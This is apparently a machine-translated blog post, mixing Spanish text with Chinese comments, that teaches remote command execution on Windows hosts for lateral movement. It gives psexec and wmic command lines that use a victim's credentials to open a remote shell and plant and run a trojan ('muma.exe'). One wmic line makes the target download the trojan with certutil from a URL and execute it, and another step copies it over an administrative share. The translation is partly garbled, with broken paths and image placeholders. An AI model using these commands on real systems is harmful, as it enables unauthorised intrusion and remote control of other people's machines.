ejecución de comandos remotos de windows

Todos los siguientes experimentos se realizan en un entorno de grupo de trabajo

psexec

psexec.exe \\ ip –accepteula -u nombre de usuario -p contraseña program.exe
psexec.exe \\ host -accepteula -u dominio \ nombre de usuario -p contraseña -d -c
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
Si se trata de un entorno de dominio, el comando es PsExec.exe \\ 192.168.23.99 -u prueba \ lisi -p 123 -c cmd

Después de obtener la cuenta y la contraseña del host de la otra parte y la otra parte abre el puerto 445, puede usar psexec para ejecutar comandos remotos.
psexec \\ 172.16.99.233 -u administrador -p 123 -c cmd.exe para obtener cmdshell psexec
\\ 172.16.99.233 -u administrador -p 123 -c muma.exe
#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。

Haga que el host 172.16.99.233 ejecute el archivo muma.exe en 172.16.99.235. Para lograr el propósito de ejecutar archivos locales en el host remoto. La máquina atacante es 172.16.99.235, y el archivo muma.exe también está en el host 172.16.99.235, pero a través del comando anterior, el archivo se puede ejecutar en el host 172.16.99.233 para lograr el efecto de control remoto.
Inserte la descripción de la imagen aquí

wmic

Método 1: controlar el host remoto para descargar y ejecutar archivos

wmic /node:172.16.99.233 /user:Administrator /password:123  process call create "cmd /c  certutil.exe -urlcache -split -f http://172.16.99.233/muma.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"

#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
Inserte la descripción de la imagen aquí
El significado del comando anterior es conectarse a 172.16.99.233 y crear un proceso. Este proceso usa cmd para ejecutar el comando para descargar el archivo en http://172.16.99.233/muma.exe y guardarlo en el archivo local c: / windows / temp / putty3.exe y ejecútelo.

Método 2: copie archivos locales en el host remoto y controle la ejecución del host remoto

copy muma.exe \\172.16.99.233\c$\windows\temp\test.exe  ##IPC拷贝木马文件
wmic /node:172.16.99.233 /user:administrator /password:123 process call create “c:\windows\temp\test.exe”

#这里面的账号密码都是被攻击机器的账号密码,ip与host也是被攻击主机的ip与host。
Inserte la descripción de la imagen aquí

Supongo que te gusta

Origin blog.csdn.net/qq_41874930/article/details/108245293
Recomendado
Clasificación